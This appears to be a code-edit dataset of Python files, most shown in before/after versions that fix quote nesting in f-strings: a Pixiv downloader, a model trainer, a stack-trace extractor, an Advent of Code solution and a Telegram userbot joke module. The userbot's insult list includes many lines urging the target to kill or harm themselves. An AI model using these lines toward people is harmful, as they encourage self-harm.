illusts_id = target_data[list_num]["id"]
user_name = target_data[list_num]['userName']
userName = name_replace(userName)
id_list.append([illusts_id,user_name])
search = name
return id_list,search
def get_user_illusts(user_id:int,cfg:dict):
id_list = []
headers = {'referer' : "https://www.pixiv.net/ranking.php",'cookie' : f"{cfg['login']['cookie']}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",'Content-Type': 'application/json'}
url = f'https://www.pixiv.net/ajax/user/{user_id}/profile/all'
user_url = f'https://www.pixiv.net/ajax/user/{user_id}'
req_user = requests.get(user_url,headers=headers)
req_user = req_user.json()
user_name = req_user['body']['name']
req = requests.get(url,headers=headers)
req = req.json()
for illusts_ids in req['body']['illusts']:
id_list.append([illusts_ids,user_name])
return id_list
# id -> artid
# get name for id mode
def get_user(id:int) -> str:
url = f'https://www.pixiv.net/artworks/{id}'
req = requests.get(url)
text = req.text
# print(text)
# find name
obj = re.compile(r'"name":"(?P<name>.*?)"')
user_name = obj.finditer(text)
# get name
for it in user_name:
name = it.group('name')
# del非法字符
name = name_replace(name)
return name
def main():
os.system('cls')
print(banner)
cfg = config_pixiv()
AllInOneDir = cfg['path']['AllInOnePath']
print('0:Pixiv_id mode\n1:Search mode\n2:Ranking mode\n3:User illusts\n4:Premium search(Need premium)')
mode = int(input('Mode:'))
print(f"Mode:{mode}".center(50,'='))
if mode == 0: #id mode
dl_img(int(input('Pixiv_id:')),cfg,AllInOneDir=AllInOneDir)
elif mode > 10000:
dl_img(mode,cfg,AllInOneDir=AllInOneDir)
elif mode == 1: #search mode
search = input("Search:")
print('0:All\n1:Safe\n2:R18(login)')
mode_num = int(input('mode:'))
id_list , search_name = pixiv_search(search,cfg,mode=mode_num)
dl_img(id_list,cfg,search_name,AllInOneDir=AllInOneDir)
elif mode == 2: #ranking mode?
# ['daily','weekly','monthly','rookie','original','female','daily_r18','male']
page = int(input('Page:'))
print('0:daily\n1:weekly\n2:monthly\n3:rookie\n4:original\n5:for female\n6:r18(login)\n7:for male')
ranking_num = int(input('ranking_mode:'))
if ranking_num == 6:
try:
print('0:daily_r18\n1:weekly_r18\n2:male_r18\n3:female_r18')
r18mode = int(input("R18_mode:"))
id_name_list , mode_ranking = ranking(page,cfg,mode_num=ranking_num,r18mode=r18mode)
# print(mode_ranking)
dl_img(id_name_list,cfg,ranking=mode_ranking,r18mode=True,AllInOneDir=AllInOneDir)
except JSONDecodeError:
exit('未登錄 . . .')
else:
id_name_list , mode_ranking = ranking(page,cfg,mode_num=ranking_num)
# print(id_name_list)
# with ThreadPoolExecutor(30) as th:
# for ids in id_name_list:
# th.submit(dl_img,id=ids[0],cfg=cfg,ranking=mode_ranking,AllInOneDir=AllInOneDir)
dl_img(id_name_list,cfg,ranking=mode_ranking,AllInOneDir=AllInOneDir)
elif mode == 3: #get_user_illusts
user_id = int(input('user_id:'))
id_list = get_user_illusts(user_id,cfg)
dl_img(id_list,cfg,AllInOneDir=AllInOneDir)
elif mode == 4: #premium_search
search = input("Search:")
print('0:All popular\n1:Popula for male\n2:Popula for female')
order_num = int(input('order:'))
print('0:r18 & safe\n1:safe\n2:R18')
mode_4_num = int(input('mode:'))
pages = int(input('pages:'))
id_list , search_name = premium_search(search,order_num,mode_4_num,pages,cfg)
dl_img(id_list,cfg,search_name,AllInOneDir=AllInOneDir)
# cfg = config_pixiv()
# print(cfg['login']['cookie'])
# id_list , search_name = pixiv_search('甘雨',cfg)
# print(name)
# print(id_list)
# name = get_user(id_list)
# mark_dir(name)
# dl_img(id_list,cfg,search_name)
# print(pixiv_get())
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
exit('\nKeyboardInterrupt exit. . .')
|
# Dmitry Kisler © 2020-present
# www.dkisler.com
import os
import pathlib
import time
import importlib
import argparse
import json
from typing import Tuple, Union
from tagger_framework.utils.logger import getLogger
import warnings
warnings.simplefilter(action='ignore',
category=FutureWarning)
MODEL_PKG_NAME = "tagger_framework.tagger.pos"
MODEL_VERSION = os.getenv("MODEL_VERSION", "v1")
BUCKET_DATA = os.getenv("BUCKET_DATA", "/data")
BUCKET_MODEL = os.getenv("BUCKET_MODEL", "/model")
def get_model_dir() -> str:
"""Generate date to store the model into."""
return f"{BUCKET_MODEL}/{MODEL_VERSION}/{time.strftime("%Y/%m/%d", time.gmtime())}"
def get_args() -> argparse.Namespace:
"""Input parameters parser.
Returns:
Namespace of stdin parameters.
"""
parser = argparse.ArgumentParser(description="Model trainer.")
parser.add_argument('--path-train',
help="Path to train corpus.",
type=str,
default=None,
required=True)
parser.add_argument('--path-dev',
help="Path to dev corpus.",
type=str,
default=None,
required=True)
parser.add_argument('--path-test',
help="Path to test corpus.",
type=str,
default=None,
required=False)
parser.add_argument('--path-model',
help="Path to pre-trained model.",
type=str,
default=None,
required=False)
parser.add_argument('--path-model-out',
help="Path to store model into.",
type=str,
default=None,
required=False)
parser.add_argument('--train-config',
help="""Configurations for model training as JSON.
Example:
{"learning_rate": 0.00001}
""",
type=str,
default=None,
required=False)
args = parser.parse_args()
return args
def train_configs_parser(conf: str) -> Tuple[Union[dict, None],
Union[None, str]]:
"""Function to parse training parameters config.
Args:
conf: Input configs string.
"""
try:
return json.loads(conf), None
except json.JSONDecodeError as ex:
return None, ex
if __name__ == "__main__":
logs = getLogger(logger=f"service/train/{MODEL_VERSION}")
logs.send("Init.", is_error=False, kill=False)
# link the model module
try:
model_module = importlib.import_module(f"{MODEL_PKG_NAME}.{MODEL_VERSION}.model")
except Exception as ex:
logs.send(f"Model {MODEL_VERSION} is not defined in the package {MODEL_PKG_NAME}.\nError:{ex}",
lineno=logs.get_line(),
kill=True)
args = get_args()
logs.send("Reading data and building corpus.", is_error=False, kill=False)
# read train data corpus
path_data_train = f"{BUCKET_DATA}/{args.path_train}"
if not os.path.isfile(path_data_train):
logs.send(f"Train data set {path_data_train} not found.",
lineno=logs.get_line(),
kill=True)
path_data_dev = f"{BUCKET_DATA}/{args.path_dev}"
if not os.path.isfile(path_data_dev):
logs.send(f"Dev data set {path_data_dev} not found.",
lineno=logs.get_line(),
kill=True)
path_data_test = None
if args.path_test:
path_data_test = f"{BUCKET_DATA}/{args.path_test}"
path_data_test = path_data_test if os.path.isfile(path_data_test) else None
# build corpus to train and eval model
try:
corpus = model_module.Corpus(path_train=path_data_train,
path_dev=path_data_dev,
path_test=path_data_test)
except Exception as ex:
logs.send(f"Corpus extraction error.\nError: {ex}",
lineno=logs.get_line(),
kill=True)
# instantiate the model
logs.send("Defining the model.", is_error=False, kill=False)
path_model = args.path_model
if path_model:
logs.send(f"Pre-trained model from {path_model} is being pre-loaded.",
is_error=False,
kill=False)
model = model_module.Model(path=path_model)
train_config = None
if args.train_config:
train_config, err = train_configs_parser(args.train_config)
logs.send("Start model training.", is_error=False, kill=False)
t0 = time.time()
train_metrics = model.train(corpus=corpus,
evaluate=True,
config=train_config)
logs.send(f"Training completed. Elapsed time {round(time.time() - t0, 2)} sec.",
is_error=False,
kill=False)
logs.send(f"Model score:\n{json.dumps(train_metrics, indent=2)}",
is_error=False,
kill=False)
if args.path_model_out:
dir_model = BUCKET_MODEL
path_model = f"{dir_model}/{args.path_model_out}"
else:
dir_model = get_model_dir()
path_model = f"{dir_model}/{MODEL_VERSION}_{time.strftime("%Y%m%dT%H%M%sZ", time.gmtime())}.pt"
logs.send(f"Saving model to {path_model}", is_error=False, kill=False)
if not os.path.isdir(f"{dir_model}"):
try:
os.makedirs(dir_model)
except Exception as ex:
logs.send(f"Error when creating {dir_model}.\nError: {ex}",
lineno=logs.get_line(),
kill=True)
# further steps should be defined depending on the tool use case
try:
model.save(path_model)
except Exception as ex:
logs.send(f"Cannot save the model to {path_model}. Error:\n{ex}",
lineno=logs.get_line(),
kill=True)
| # Dmitry Kisler © 2020-present
# www.dkisler.com
import os
import pathlib
import time
import importlib
import argparse
import json
from typing import Tuple, Union
from tagger_framework.utils.logger import getLogger
import warnings
warnings.simplefilter(action='ignore',
category=FutureWarning)
MODEL_PKG_NAME = "tagger_framework.tagger.pos"
MODEL_VERSION = os.getenv("MODEL_VERSION", "v1")
BUCKET_DATA = os.getenv("BUCKET_DATA", "/data")
BUCKET_MODEL = os.getenv("BUCKET_MODEL", "/model")
def get_model_dir() -> str:
"""Generate date to store the model into."""
return f"{BUCKET_MODEL}/{MODEL_VERSION}/{time.strftime('%Y/%m/%d', time.gmtime())}"
def get_args() -> argparse.Namespace:
"""Input parameters parser.
Returns:
Namespace of stdin parameters.
"""
parser = argparse.ArgumentParser(description="Model trainer.")
parser.add_argument('--path-train',
help="Path to train corpus.",
type=str,
default=None,
required=True)
parser.add_argument('--path-dev',
help="Path to dev corpus.",
type=str,
default=None,
required=True)
parser.add_argument('--path-test',
help="Path to test corpus.",
type=str,
default=None,
required=False)
parser.add_argument('--path-model',
help="Path to pre-trained model.",
type=str,
default=None,
required=False)
parser.add_argument('--path-model-out',
help="Path to store model into.",
type=str,
default=None,
required=False)
parser.add_argument('--train-config',
help="""Configurations for model training as JSON.
Example:
{"learning_rate": 0.00001}
""",
type=str,
default=None,
required=False)
args = parser.parse_args()
return args
def train_configs_parser(conf: str) -> Tuple[Union[dict, None],
Union[None, str]]:
"""Function to parse training parameters config.
Args:
conf: Input configs string.
"""
try:
return json.loads(conf), None
except json.JSONDecodeError as ex:
return None, ex
if __name__ == "__main__":
logs = getLogger(logger=f"service/train/{MODEL_VERSION}")
logs.send("Init.", is_error=False, kill=False)
# link the model module
try:
model_module = importlib.import_module(f"{MODEL_PKG_NAME}.{MODEL_VERSION}.model")
except Exception as ex:
logs.send(f"Model {MODEL_VERSION} is not defined in the package {MODEL_PKG_NAME}.\nError:{ex}",
lineno=logs.get_line(),
kill=True)
args = get_args()
logs.send("Reading data and building corpus.", is_error=False, kill=False)
# read train data corpus
path_data_train = f"{BUCKET_DATA}/{args.path_train}"
if not os.path.isfile(path_data_train):
logs.send(f"Train data set {path_data_train} not found.",
lineno=logs.get_line(),
kill=True)
path_data_dev = f"{BUCKET_DATA}/{args.path_dev}"
if not os.path.isfile(path_data_dev):
logs.send(f"Dev data set {path_data_dev} not found.",
lineno=logs.get_line(),
kill=True)
path_data_test = None
if args.path_test:
path_data_test = f"{BUCKET_DATA}/{args.path_test}"
path_data_test = path_data_test if os.path.isfile(path_data_test) else None
# build corpus to train and eval model
try:
corpus = model_module.Corpus(path_train=path_data_train,
path_dev=path_data_dev,
path_test=path_data_test)
except Exception as ex:
logs.send(f"Corpus extraction error.\nError: {ex}",
lineno=logs.get_line(),
kill=True)
# instantiate the model
logs.send("Defining the model.", is_error=False, kill=False)
path_model = args.path_model
if path_model:
logs.send(f"Pre-trained model from {path_model} is being pre-loaded.",
is_error=False,
kill=False)
model = model_module.Model(path=path_model)
train_config = None
if args.train_config:
train_config, err = train_configs_parser(args.train_config)
logs.send("Start model training.", is_error=False, kill=False)
t0 = time.time()
train_metrics = model.train(corpus=corpus,
evaluate=True,
config=train_config)
logs.send(f"Training completed. Elapsed time {round(time.time() - t0, 2)} sec.",
is_error=False,
kill=False)
logs.send(f"Model score:\n{json.dumps(train_metrics, indent=2)}",
is_error=False,
kill=False)
if args.path_model_out:
dir_model = BUCKET_MODEL
path_model = f"{dir_model}/{args.path_model_out}"
else:
dir_model = get_model_dir()
path_model = f"{dir_model}/{MODEL_VERSION}_{time.strftime('%Y%m%dT%H%M%sZ', time.gmtime())}.pt"
logs.send(f"Saving model to {path_model}", is_error=False, kill=False)
if not os.path.isdir(f"{dir_model}"):
try:
os.makedirs(dir_model)
except Exception as ex:
logs.send(f"Error when creating {dir_model}.\nError: {ex}",
lineno=logs.get_line(),
kill=True)
# further steps should be defined depending on the tool use case
try:
model.save(path_model)
except Exception as ex:
logs.send(f"Cannot save the model to {path_model}. Error:\n{ex}",
lineno=logs.get_line(),
kill=True)
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import glob
import os
import re
from typing import List
from confidential_ml_utils.exceptions import (
PublicValueError,
print_prefixed_stack_trace_and_raise,
)
class StackTraceExtractor:
"""
A class to perform extraction of stack traces, exception types and
optionally exception messages from files that might contain other
sensitive data.
Attributes
----------
show_exception_message : bool
True to extract exception messages. False to skip them.
prefix : bool
Prefix to prepend extracted lines with. Defaults to "SystemLog".
Methods
-------
extract(path):
Extracts traces and exceptions from file to stdout.
"""
def __init__(
self,
show_exception_message: bool = False,
prefix: str = "SystemLog",
):
self.in_python_traceback = False
self.show_exception_message = show_exception_message
self.prefix = prefix
def _parse_trace_python(self, string: str):
r = re.compile(r"Traceback \(most recent call last\):")
m = r.search(string)
if m:
self.in_python_traceback = True
return None
r = re.compile(r"File (?P<file>.*), line (?P<line>\d*), in (?P<method>.*)")
m = r.search(string)
if m:
return m
r = re.compile(r"(?P<type>.*Error): (?P<message>.*)")
m = r.search(string)
if m and self.in_python_traceback:
self.in_python_traceback = False
return m
return None
@staticmethod
def _parse_trace_csharp(string: str):
r = re.compile(
r"at (?P<namespace>.*)\.(?P<class>.*)\.(?P<method>.*) in (?P<file>.*):line (?P<line>\d*)" # noqa:501
)
m = r.search(string)
if m:
return m
r = re.compile(r"Unhandled exception. (?P<type>.*): (?P<message>.*)")
m = r.search(string)
if m:
return m
return None
def _parse_file(self, file: str) -> None:
print(f"{self.prefix}: Parsing file {os.path.abspath(file)}")
with open(file, "r") as f:
for line in f:
m = StackTraceExtractor._parse_trace_csharp(line)
if m and m.groupdict().get("type"):
print(f"{self.prefix}: type: {m.groupdict()["type"]}")
if self.show_exception_message:
print(f"{self.prefix}: message: {m.groupdict()["message"]}")
continue
elif m and m.groupdict().get("namespace"):
print(f"{self.prefix}: namespace: {m.groupdict()["namespace"]}")
print(f"{self.prefix}: class: {m.groupdict()["class"]}")
print(f"{self.prefix}: method: {m.groupdict()["method"]}")
print(f"{self.prefix}: file: {m.groupdict()["file"]}")
print(f"{self.prefix}: line: {m.groupdict()["line"]}")
print()
continue
m = self._parse_trace_python(line)
if m and m.groupdict().get("type"):
print(f"{self.prefix}: type: {m.groupdict()["type"]}")
if self.show_exception_message:
print(f"{self.prefix}: message: {m.groupdict()["message"]}")
print()
elif m and m.groupdict().get("file"):
print(f"{self.prefix}: file: {m.groupdict()["file"]}")
print(f"{self.prefix}: line: {m.groupdict()["line"]}")
print(f"{self.prefix}: method: {m.groupdict()["method"]}")
def _get_files(self, path) -> List[str]:
if os.path.isfile(path):
print(f"{self.prefix}: Input is a file")
return [path]
if os.path.isdir(path):
print(f"{self.prefix}: Input is a directory")
files = glob.glob(path + "/*.err")
return files
else:
raise PublicValueError("Provided path is neither a file nor a directory")
def extract(self, path: str) -> None:
"""
Run extraction on the given resources. Extracted traces and exceptions
will be printed to stdout.
Args:
path (str): file or path. If path, extraction will be performed on
all files with '.err' extension within that directory (not recursive).
Hidden files will be ignored.
"""
try:
for file in self._get_files(path):
self._parse_file(file)
assert False
except BaseException as e:
print(f"{self.prefix}: There is a problem with the exceptionExtractor.")
print_prefixed_stack_trace_and_raise(err=e, keep_message=True)
| # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import glob
import os
import re
from typing import List
from confidential_ml_utils.exceptions import (
PublicValueError,
print_prefixed_stack_trace_and_raise,
)
class StackTraceExtractor:
"""
A class to perform extraction of stack traces, exception types and
optionally exception messages from files that might contain other
sensitive data.
Attributes
----------
show_exception_message : bool
True to extract exception messages. False to skip them.
prefix : bool
Prefix to prepend extracted lines with. Defaults to "SystemLog".
Methods
-------
extract(path):
Extracts traces and exceptions from file to stdout.
"""
def __init__(
self,
show_exception_message: bool = False,
prefix: str = "SystemLog",
):
self.in_python_traceback = False
self.show_exception_message = show_exception_message
self.prefix = prefix
def _parse_trace_python(self, string: str):
r = re.compile(r"Traceback \(most recent call last\):")
m = r.search(string)
if m:
self.in_python_traceback = True
return None
r = re.compile(r"File (?P<file>.*), line (?P<line>\d*), in (?P<method>.*)")
m = r.search(string)
if m:
return m
r = re.compile(r"(?P<type>.*Error): (?P<message>.*)")
m = r.search(string)
if m and self.in_python_traceback:
self.in_python_traceback = False
return m
return None
@staticmethod
def _parse_trace_csharp(string: str):
r = re.compile(
r"at (?P<namespace>.*)\.(?P<class>.*)\.(?P<method>.*) in (?P<file>.*):line (?P<line>\d*)" # noqa:501
)
m = r.search(string)
if m:
return m
r = re.compile(r"Unhandled exception. (?P<type>.*): (?P<message>.*)")
m = r.search(string)
if m:
return m
return None
def _parse_file(self, file: str) -> None:
print(f"{self.prefix}: Parsing file {os.path.abspath(file)}")
with open(file, "r") as f:
for line in f:
m = StackTraceExtractor._parse_trace_csharp(line)
if m and m.groupdict().get("type"):
print(f"{self.prefix}: type: {m.groupdict()['type']}")
if self.show_exception_message:
print(f"{self.prefix}: message: {m.groupdict()['message']}")
continue
elif m and m.groupdict().get("namespace"):
print(f"{self.prefix}: namespace: {m.groupdict()['namespace']}")
print(f"{self.prefix}: class: {m.groupdict()['class']}")
print(f"{self.prefix}: method: {m.groupdict()['method']}")
print(f"{self.prefix}: file: {m.groupdict()['file']}")
print(f"{self.prefix}: line: {m.groupdict()['line']}")
print()
continue
m = self._parse_trace_python(line)
if m and m.groupdict().get("type"):
print(f"{self.prefix}: type: {m.groupdict()['type']}")
if self.show_exception_message:
print(f"{self.prefix}: message: {m.groupdict()['message']}")
print()
elif m and m.groupdict().get("file"):
print(f"{self.prefix}: file: {m.groupdict()['file']}")
print(f"{self.prefix}: line: {m.groupdict()['line']}")
print(f"{self.prefix}: method: {m.groupdict()['method']}")
def _get_files(self, path) -> List[str]:
if os.path.isfile(path):
print(f"{self.prefix}: Input is a file")
return [path]
if os.path.isdir(path):
print(f"{self.prefix}: Input is a directory")
files = glob.glob(path + "/*.err")
return files
else:
raise PublicValueError("Provided path is neither a file nor a directory")
def extract(self, path: str) -> None:
"""
Run extraction on the given resources. Extracted traces and exceptions
will be printed to stdout.
Args:
path (str): file or path. If path, extraction will be performed on
all files with '.err' extension within that directory (not recursive).
Hidden files will be ignored.
"""
try:
for file in self._get_files(path):
self._parse_file(file)
assert False
except BaseException as e:
print(f"{self.prefix}: There is a problem with the exceptionExtractor.")
print_prefixed_stack_trace_and_raise(err=e, keep_message=True)
|
""" https://adventofcode.com/2018/day/3 """
def readFile():
l = []
with open(f"{__file__.rstrip("code.py")}input.txt", "r") as f:
line = f.readline()
while line:
s = line.split(" ")
dist = s[2].split(",")
size = s[3].split("x")
fields = []
for i in range(int(dist[0]), int(dist[0]) + int(size[0])):
for j in range(int(dist[1][:-1]), int(dist[1][:-1]) + int(size[1])):
fields.append((i, j))
l.append({
"id" : int(s[0][1:]),
"fields" : fields
})
line = f.readline()
return l
def part1(vals : list):
data = {}
# get count for every field
for val in vals:
for field in val["fields"]:
f = str(field)
if f in data:
data[f] += 1
else:
data[f] = 1
# count fields with count higher than one
overlap = 0
for d in data:
if data[d] > 1:
overlap += 1
return overlap
def part2(vals : list):
data = {}
# get count for every field
for val in vals:
for field in val["fields"]:
f = str(field)
if f in data:
data[f] += 1
else:
data[f] = 1
# look for area covered by only one id
for val in vals:
check = True
for field in val["fields"]:
if data[str(field)] > 1:
check = False
break
if check:
return val["id"]
if __name__ == "__main__":
vals = readFile()
print(f"Part 1: {part1(vals)}")
print(f"Part 2: {part2(vals)}") | """ https://adventofcode.com/2018/day/3 """
def readFile():
l = []
with open(f"{__file__.rstrip('code.py')}input.txt", "r") as f:
line = f.readline()
while line:
s = line.split(" ")
dist = s[2].split(",")
size = s[3].split("x")
fields = []
for i in range(int(dist[0]), int(dist[0]) + int(size[0])):
for j in range(int(dist[1][:-1]), int(dist[1][:-1]) + int(size[1])):
fields.append((i, j))
l.append({
"id" : int(s[0][1:]),
"fields" : fields
})
line = f.readline()
return l
def part1(vals : list):
data = {}
# get count for every field
for val in vals:
for field in val["fields"]:
f = str(field)
if f in data:
data[f] += 1
else:
data[f] = 1
# count fields with count higher than one
overlap = 0
for d in data:
if data[d] > 1:
overlap += 1
return overlap
def part2(vals : list):
data = {}
# get count for every field
for val in vals:
for field in val["fields"]:
f = str(field)
if f in data:
data[f] += 1
else:
data[f] = 1
# look for area covered by only one id
for val in vals:
check = True
for field in val["fields"]:
if data[str(field)] > 1:
check = False
break
if check:
return val["id"]
if __name__ == "__main__":
vals = readFile()
print(f"Part 1: {part1(vals)}")
print(f"Part 2: {part2(vals)}") |
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
""" Userbot module for having some fun with people. """
from asyncio import sleep
from random import choice, getrandbits, randint
from re import sub
import time
from collections import deque
import requests
from cowpy import cow
from userbot import CMD_HELP
from userbot.events import register
from userbot.modules.admin import get_user_from_event
# ================= CONSTANT =================
METOOSTR = [
"Me too thanks",
"Haha yes, me too",
"Same lol",
"Me irl",
"Same here",
"Haha yes",
"Me rn",
]
ZALG_LIST = [[
"̖",
" ̗",
" ̘",
" ̙",
" ̜",
" ̝",
" ̞",
" ̟",
" ̠",
" ̤",
" ̥",
" ̦",
" ̩",
" ̪",
" ̫",
" ̬",
" ̭",
" ̮",
" ̯",
" ̰",
" ̱",
" ̲",
" ̳",
" ̹",
" ̺",
" ̻",
" ̼",
" ͅ",
" ͇",
" ͈",
" ͉",
" ͍",
" ͎",
" ͓",
" ͔",
" ͕",
" ͖",
" ͙",
" ͚",
" ",
],
[
" ̍",
" ̎",
" ̄",
" ̅",
" ̿",
" ̑",
" ̆",
" ̐",
" ͒",
" ͗",
" ͑",
" ̇",
" ̈",
" ̊",
" ͂",
" ̓",
" ̈́",
" ͊",
" ͋",
" ͌",
" ̃",
" ̂",
" ̌",
" ͐",
" ́",
" ̋",
" ̏",
" ̽",
" ̉",
" ͣ",
" ͤ",
" ͥ",
" ͦ",
" ͧ",
" ͨ",
" ͩ",
" ͪ",
" ͫ",
" ͬ",
" ͭ",
" ͮ",
" ͯ",
" ̾",
" ͛",
" ͆",
" ̚",
],
[
" ̕",
" ̛",
" ̀",
" ́",
" ͘",
" ̡",
" ̢",
" ̧",
" ̨",
" ̴",
" ̵",
" ̶",
" ͜",
" ͝",
" ͞",
" ͟",
" ͠",
" ͢",
" ̸",
" ̷",
" ͡",
]]
EMOJIS = [
"😂",
"😂",
"👌",
"✌",
"💞",
"👍",
"👌",
"💯",
"🎶",
"👀",
"😂",
"👓",
"👏",
"👐",
"🍕",
"💥",
"🍴",
"💦",
"💦",
"🍑",
"🍆",
"😩",
"😏",
"👉👌",
"👀",
"👅",
"😩",
"🚰",
]
INSULT_STRINGS = [
"Owww ... Such a stupid idiot.",
"Don't drink and type.",
"I think you should go home or better a mental asylum.",
"Command not found. Just like your brain.",
"Do you realize you are making a fool of yourself? Apparently not.",
"You can type better than that.",
"Bot rule 544 section 9 prevents me from replying to stupid humans like you.",
"Sorry, we do not sell brains.",
"Believe me you are not normal.",
"I bet your brain feels as good as new, seeing that you never use it.",
"If I wanted to kill myself I'd climb your ego and jump to your IQ.",
"Zombies eat brains... you're safe.",
"You didn't evolve from apes, they evolved from you.",
"Come back and talk to me when your I.Q. exceeds your age.",
"I'm not saying you're stupid, I'm just saying you've got bad luck when it comes to thinking.",
"What language are you speaking? Cause it sounds like bullshit.",
"Stupidity is not a crime so you are free to go.",
"You are proof that evolution CAN go in reverse.",
"I would ask you how old you are but I know you can't count that high.",
"As an outsider, what do you think of the human race?",
"Brains aren't everything. In your case they're nothing.",
"Ordinarily people live and learn. You just live.",
"I don't know what makes you so stupid, but it really works.",
"Keep talking, someday you'll say something intelligent! (I doubt it though)",
"Shock me, say something intelligent.",
"Your IQ's lower than your shoe size.",
"Alas! Your neurotransmitters are no more working.",
"Are you crazy you fool.",
"Everyone has the right to be stupid but you are abusing the privilege.",
"I'm sorry I hurt your feelings when I called you stupid. I thought you already knew that.",
"You should try tasting cyanide.",
"Your enzymes are meant to digest rat poison.",
"You should try sleeping forever.",
"Pick up a gun and shoot yourself.",
"You could make a world record by jumping from a plane without parachute.",
"Stop talking BS and jump in front of a running bullet train.",
"Try bathing with Hydrochloric Acid instead of water.",
"Try this: if you hold your breath underwater for an hour, you can then hold it forever.",
"Go Green! Stop inhaling Oxygen.",
"God was searching for you. You should leave to meet him.",
"give your 100%. Now, go donate blood.",
"Try jumping from a hundred story building but you can do it only once.",
"You should donate your brain seeing that you never used it.",
"Volunteer for target in an firing range.",
"Head shots are fun. Get yourself one.",
"You should try swimming with great white sharks.",
"You should paint yourself red and run in a bull marathon.",
"You can stay underwater for the rest of your life without coming back up.",
"How about you stop breathing for like 1 day? That'll be great.",
"Try provoking a tiger while you both are in a cage.",
"Have you tried shooting yourself as high as 100m using a canon.",
"You should try holding TNT in your mouth and igniting it.",
"Try playing catch and throw with RDX its fun.",
"I heard phogine is poisonous but i guess you wont mind inhaling it for fun.",
"Launch yourself into outer space while forgetting oxygen on Earth.",
"You should try playing snake and ladders, with real snakes and no ladders.",
"Dance naked on a couple of HT wires.",
"Active Volcano is the best swimming pool for you.",
"You should try hot bath in a volcano.",
"Try to spend one day in a coffin and it will be yours forever.",
"Hit Uranium with a slow moving neutron in your presence. It will be a worthwhile experience.",
"You can be the first person to step on sun. Have a try.",
]
UWUS = [
"(・`ω´・)",
";;w;;",
"owo",
"UwU",
">w<",
"^w^",
r"\(^o\) (/o^)/",
"( ^ _ ^)∠☆",
"(ô_ô)",
"~:o",
";-;",
"(*^*)",
"(>_",
"(♥_♥)",
"*(^O^)*",
"((+_+))",
]
FACEREACTS = [
"ʘ‿ʘ",
"ヾ(-_- )ゞ",
"(っ˘ڡ˘ς)",
"(´ж`ς)",
"( ಠ ʖ̯ ಠ)",
"(° ͜ʖ͡°)╭∩╮",
"(ᵟຶ︵ ᵟຶ)",
"(งツ)ว",
"ʚ(•`",
"(っ▀¯▀)つ",
"(◠﹏◠)",
"( ͡ಠ ʖ̯ ͡ಠ)",
"( ఠ ͟ʖ ఠ)",
"(∩`-´)⊃━☆゚.*・。゚",
"(⊃。•́‿•̀。)⊃",
"(._.)",
"{•̃_•̃}",
"(ᵔᴥᵔ)",
"♨_♨",
"⥀.⥀",
"ح˚௰˚づ ",
"(҂◡_◡)",
"ƪ(ړײ)ƪ",
"(っ•́。•́)♪♬",
"◖ᵔᴥᵔ◗ ♪ ♫ ",
"(☞゚ヮ゚)☞",
"[¬º-°]¬",
"(Ծ‸ Ծ)",
"(•̀ᴗ•́)و ̑̑",
"ヾ(´〇`)ノ♪♪♪",
"(ง'̀-'́)ง",
"ლ(•́•́ლ)",
"ʕ •́؈•̀ ₎",
"♪♪ ヽ(ˇ∀ˇ )ゞ",
"щ(゚Д゚щ)",
"( ˇ෴ˇ )",
"눈_눈",
"(๑•́ ₃ •̀๑) ",
"( ˘ ³˘)♥ ",
"ԅ(≖‿≖ԅ)",
"♥‿♥",
"◔_◔",
"⁽⁽ଘ( ˊᵕˋ )ଓ⁾⁾",
"乁( ◔ ౪◔)「 ┑( ̄Д  ̄)┍",
"( ఠൠఠ )ノ",
"٩(๏_๏)۶",
"┌(ㆆ㉨ㆆ)ʃ",
"ఠ_ఠ",
"(づ。◕‿‿◕。)づ",
"(ノಠ ∩ಠ)ノ彡( \\o°o)\\",
"“ヽ(´▽`)ノ”",
"༼ ༎ຶ ෴ ༎ຶ༽",
"。゚( ゚இ‸இ゚)゚。",
"(づ ̄ ³ ̄)づ",
"(⊙.☉)7",
"ᕕ( ᐛ )ᕗ",
"t(-_-t)",
"(ಥ⌣ಥ)",
"ヽ༼ ಠ益ಠ ༽ノ",
"༼∵༽ ༼⍨༽ ༼⍢༽ ༼⍤༽",
"ミ●﹏☉ミ",
"(⊙_◎)",
"¿ⓧ_ⓧﮌ",
"ಠ_ಠ",
"(´・_・`)",
"ᕦ(ò_óˇ)ᕤ",
"⊙﹏⊙",
"(╯°□°)╯︵ ┻━┻",
r"¯\_(⊙︿⊙)_/¯",
"٩◔̯◔۶",
"°‿‿°",
"ᕙ(⇀‸↼‶)ᕗ",
"⊂(◉‿◉)つ",
"V•ᴥ•V",
"q(❂‿❂)p",
"ಥ_ಥ",
"ฅ^•ﻌ•^ฅ",
"ಥ﹏ಥ",
"( ^_^)o自自o(^_^ )",
"ಠ‿ಠ",
"ヽ(´▽`)/",
"ᵒᴥᵒ#",
"( ͡° ͜ʖ ͡°)",
"┬─┬ ノ( ゜-゜ノ)",
"ヽ(´ー`)ノ",
"☜(⌒▽⌒)☞",
"ε=ε=ε=┌(;*´Д`)ノ",
"(╬ ಠ益ಠ)",
"┬─┬⃰͡ (ᵔᵕᵔ͜ )",
"┻━┻ ︵ヽ(`Д´)ノ︵ ┻━┻",
r"¯\_(ツ)_/¯",
"ʕᵔᴥᵔʔ",
"(`・ω・´)",
"ʕ•ᴥ•ʔ",
"ლ(`ー´ლ)",
"ʕʘ̅͜ʘ̅ʔ",
"( ゚Д゚)",
r"¯\(°_o)/¯",
"(。◕‿◕。)",
]
RUNS_STR = [
"Runs to Thanos..",
"Runs far, far away from earth..",
"Running faster than Bolt coz i'mma userbot !!",
"Runs to Marie..",
"This Group is too cancerous to deal with.",
"Cya bois",
"Kys",
"I go away",
"I am just walking off, coz me is too fat.",
"I Fugged off!",
"Will run for chocolate.",
"I run because I really like food.",
"Running...\nbecause dieting is not an option.",
"Wicked fast runnah",
"If you wanna catch me, you got to be fast...\nIf you wanna stay with me, you got to be good...\nBut if you wanna pass me...\nYou've got to be kidding.",
"Anyone can run a hundred meters, it's the next forty-two thousand and two hundred that count.",
"Why are all these people following me?",
"Are the kids still chasing me?",
"Running a marathon...there's an app for that.",
]
CHASE_STR = [
"Where do you think you're going?",
"Huh? what? did they get away?",
